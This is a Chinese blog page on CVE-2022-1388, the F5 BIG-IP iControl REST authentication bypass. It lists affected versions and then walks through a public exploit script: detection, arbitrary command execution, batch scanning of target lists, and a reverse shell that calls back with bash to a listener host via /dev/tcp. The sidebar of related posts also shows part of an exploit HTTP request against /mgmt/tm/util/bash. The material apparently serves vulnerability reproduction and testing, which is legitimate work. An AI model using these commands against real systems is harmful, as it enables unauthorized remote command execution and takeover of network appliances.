CVE-2022-1388:F5 BIG-IP iControl REST RCE

最新推荐文章于 2023-09-22 20:37:39 发布

原创最新推荐文章于 2023-09-22 20:37:39 发布 · 767 阅读

2 ·

CC 4.0 BY-SA版权

文章标签：

#CVE-2022-1388 #F5 Big-IP #漏洞预警 #漏洞复现 #红蓝对抗

该博客介绍了F5 BIG-IP系统多个版本存在的安全漏洞，这些漏洞可能导致未授权的攻击者执行任意系统命令、篡改文件或禁用服务。提供了检测脚本CVE_2022_1388.py用于检测受影响的设备，并演示了如何进行漏洞检测、命令执行、批量检测及反弹shell的操作。

影响产品

F5 BIG-IP 11.6.1 - 11.6.5
F5 BIG-IP 12.1.0 - 12.1.6
F5 BIG-IP 13.1.0 - 13.1.4
F5 BIG-IP 14.1.0 - 14.1.4
F5 BIG-IP 15.1.0 - 15.1.5
F5 BIG-IP 16.1.0 - 16.1.2

漏洞影响

此漏洞可能允许未经身份验证的攻击者通过管理端口和/或自身IP地址对BIG-IP系统进行网络访问，以执行任意系统命令、创建或删除文件或禁用服务

漏洞检测

检测脚本：https://github.com/Al1ex/CVE-2022-1388

基本用法

python3 CVE_2022_1388.py

漏洞检测

python3 CVE_2022_1388.py -v true -u https://192.168.17.200

命令执行

python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c id

python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c whoami

批量检测

python3 CVE_2022_1388.py -s true -f check.txt

反弹shell

python3 CVE_2022_1388.py -r true -u https://192.168.17.200 -c "bash -i >&/dev/tcp/192.168.17.175/8888 0>&1"

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

FLy_鹏程万里

关注关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

CVE-2022-1388 F5 BIG-IP 未授权RCE漏洞

战神/calmness的博客

05-10

1092

目录描述危险级别影响版本过程修复建议参考描述 BIG-IP本地流量管理器(LTM) 是一款出色的应用流量管理系统。近日披露F5 BIG-IP存在一处远程代码执行漏洞。漏洞根源存在于iControl REST组件中，未经身份验证的攻击者可以发送请求绕过BIG-IP中的iControl REST认证，进而导致可以在目标主机上执行任意系统命令等危险级别高危 RCE任意命令执行影响版本 BIG-IP 16.x: 16.1.0 - 16....

F5 BIG-IP iControl REST命令执行(CVE-2022-1388)

不忘初心，护天下安全！

06-27

1102

2022年5月6日，F5官网发布安全公告，披露F5 BIG-IP存在一处远程代码执行漏洞（CVE-2022-1388）。漏洞存在于iControl REST组件中，该漏洞允许定义身份验证的攻击者通过 BIG-IP 管理界面和自身IP地址对 iControl REST API 接口进行网络访问，进而导致可以在目标主机上执行任意系统命令、创建或删除文件或禁用BIG-IP上的服务。组件：F5 BIG-IP iControl REST漏洞类型：身份验证绕过影响：命令执行简述：该漏洞允许未经身份验证的攻击者通过管理口

参与评论您还未登录，请先登录后发表或查看评论

CVE-2022-1388-F5BIG-IP未授权RCE流量特征分析

12306小哥

06-25

601

此操作仅用于技术交流和学习研究使用，请勿用于非法攻击，否则造成一切后果与本人无关在F5 BIG-IP 16.1.x 16.1.2.2之前的版本、15.1.5.1之前的15.1.x版本、14.1.4.6之前的14.1.x版本、13.1.5之前的13.1.x版本以及所有12.1.x和11.6.x版本，未公开的请求可能会绕过iControl REST身份验证。注意：未评估已达到技术支持终止(EoTS)的软件版本。...

漏洞CVE-2022-1388

x10n9的博客

03-10

712

CVE-2022-1388是一个影响F5 BIG-IP设备的严重漏洞12，它可以让未经身份验证的攻击者绕过iControl REST认证，通过管理端口执行恶意命令。

精选资源

CVE-2021-22986:CVE-2021-22986和F5 BIG-IP RCE

03-25

此漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问，以执行任意系统命令，创建或删除文件以及禁用服务。此漏洞只能通过控制平面利用，而不能通过数据平面利用。剥削...

F5 BIG-IP iControl REST未授权命令注入RCE（CVE-2021-22986）

xiaobai_20190815的博客

05-17

1134

一、漏洞描述 F5 BIG-IP 链路控制器用于最大限度提升链路性能与可用性的下一代广域网链路流量管理。F5 BIG-IP 存在代码执行漏洞，该漏洞允许定义身份验证的攻击者通过 BIG-IP 管理界面和自身IP地址对 iControl REST 接口进行网络访问，以执行任意系统命令，控制目标机器。二、影响版本 F5 BIG-IQ 6.0.0-6.1.0 F5 BIG-IQ 7.0.0-7.0.0.1 F5 BIG-IQ 7.1.0-7.1.0.2 F5 BIG-IP 12.1.0-12.1.5

CVE-2021-22986 F5 BIG-IP 远程代码执行漏洞复现

qq_32660043的博客

03-22

4640

CVE-2021-22986 F5 BIG-IP 远程代码执行漏洞复现

BIG-IP(BIG-IQ)未授权RCE(CVE-2021-22986)1

08-08

iControl REST是F5 BIG-IP和BIG-IQ系统提供的一个API接口，允许管理员通过RESTful协议来管理和配置设备。在这个漏洞中，接口的安全控制失效，导致了未授权的远程代码执行风险。 4. **受影响版本** 漏洞影响了多个...

CVE-2022-1388-EXP(F5-BIGIP)

PolarPeak的博客

05-14

1160

简介 F5 BIG-IP 是美国``F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 EXP POST /mgmt/tm/util/bash HTTP/1.1 Host: X-F5-Auth-Token: a Authorization: Basic YWRtaW46 Connection: keep-alive, x-F5-Auth-Token Content-Length: 0 Cache-Control: max-age=0 {

CVE-2022-1388——F5 BIG-IP iControl REST 身份认证绕过漏洞

LiBai'S BLOG

05-06

7626

漏洞描述 BIG-IP 是 F5 公司的一款应用交付服务是面向以应用为中心的世界先进技术。借助 BIG-IP 应用程序交付控制器保持应用程序正常运行。BIG-IP 本地流量管理器 (LTM) 和 BIG-IP DNS 能够处理应用程序流量并保护基础设施。 CVE-2022-1388 未经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访问，执行任意系统命令、创建或删除文件或禁用服务。漏洞危害该漏洞CVSS评分：9.8 危害等级：严重影响范围 11.6.1 - 11..

CVE-2022-1388：F5 BIG-IP远程命令执行

Websec

05-13

2197

参考文章: F5 BIG-IP(CVE-2022-1388) RCE GitHub - horizon3ai/CVE-2022-1388: POC for CVE-2022-1388 1、漏洞描述 F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。iControl REST 是iControl 框架的演变，使用 REpresentational State Transfer (REST)。这允许用户或脚本与 F5 设备之间进行轻量级、快速的交互

自学黑客（网络安全），一般人我劝你还是算了吧

顶峰

09-22

413

网络安全自学路线

CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现

weixin_50464560的博客

05-10

2347

转载至CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现-网盾安全学院 (315safe.com) 漏洞信息 F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。2022年5月4日，F5官方发布安全通告，修复了一个存在于BIG-IP iControl REST中的身份验证绕过漏洞。漏洞编号：CVE-2022-1388，影响版本如下：环境搭建下载v15.x系列：首次运行需要修改

F5 CVE-2022-1388 CVE-2021-22986测试

weixin_44184011的博客

08-14

1243

又到了护网的时候，客户开始关注安全问题，来跟我咨询两个F5的CVE，CVE-2022-1388 CVE-2021-22986。在给客户提供了解决方案之后，由于这两个CVE时间都比较长（一个是2021年一个是2022年的），所以做了个简单的POC。两个CVE都是基于F5的RESTAPI进行利用，可绕过身份验证，远程执行命令。可通过升级的方式修复，如果暂时不方便升级，可以根据官方指示进行缓解。

CVE-2022-1388 F5 BIG-IP权限绕过命令执行漏洞复现

热爱学习，喜欢折腾！

09-02

3122

F5Networks(纳斯达克: FFIV)，全球领先的应用交付网络（ADN）领域的厂商，创建于1996年，总部位于美国西雅图市，F5为全球大型企业、运营商、政府与消费品牌提供更加快速、安全以及智能的应用，通过交付云与安全解决方案，F5帮助企业在不损失速度与管理性的同时享有它们所需的应用架构。F5官网发布安全公告，披露F5 BIG-IP存在一处远程代码执行漏洞（CVE-2022-1388）。

F5 BIG-IP 存在远程命令执行漏洞(CVE-2022-1388)

nnn2188185的博客

05-06

932

F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在访问控制错误漏洞，攻击者可以通过未公开的请求利用该漏洞绕过 BIG-IP 中的 iControl REST 身份验证来控制受影响的系统。可造成远程命令执行漏洞

F5 BIG-IP远程代码执行漏洞

问题很多的小明

07-09

1965

F5 RCE和Getshell 漏洞分析以及复现 0x01 漏洞概述在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。未授权的远程攻击者通过向该页面发送特制的请求包，可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能，包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。影响范围 BIG-IP 15.x: 15.1.0/15.0.0 BIG-IP 14.x: 14.1.0 ~ 14.1

[CVE-2022-1388]F5-BIGIP iControl REST绕过授权访问漏洞

whoami

05-09

3336

一、背景 F5 BIG-IP产品系列包括运行F5 TMOS操作系统的硬件、模块化软件和虚拟设备。根据所选设备，可以添加一个或多个 BIG-IP 产品模块。产品包括： BIG-IP 本地流量管理器 (LTM) ：基于全代理架构，具有缓存、压缩和 tcp 加速的本地负载平衡。 BIG-IP DNS：智能全球站点负载平衡 (GSLB) 和权威 DNS 服务器。根据用户、网络和云性能条件分发 DNS 和应用程序请求。 BIG-IP 高级防火墙管理器 (AFM)：本地 DDoS 保护和数据中心防火墙。 BIG

python怎么读取yaml文件中的如下格式： EC2_ID_WHITELIST: CVE-2021-45046: - xxx - xxx CVE-2021-44228: [] CVE-2021-36163: [] CVE-2022-40664: [] CVE-2023-34034: [] CVE-2022-31692: [] CVE-2022-2216: [] CVE-2023-26136: [] CVE-2022-26945: [] CVE-2023-37466: [] CVE-2023-32314: [] CVE-2019-20477: [] CVE-2020-11984: []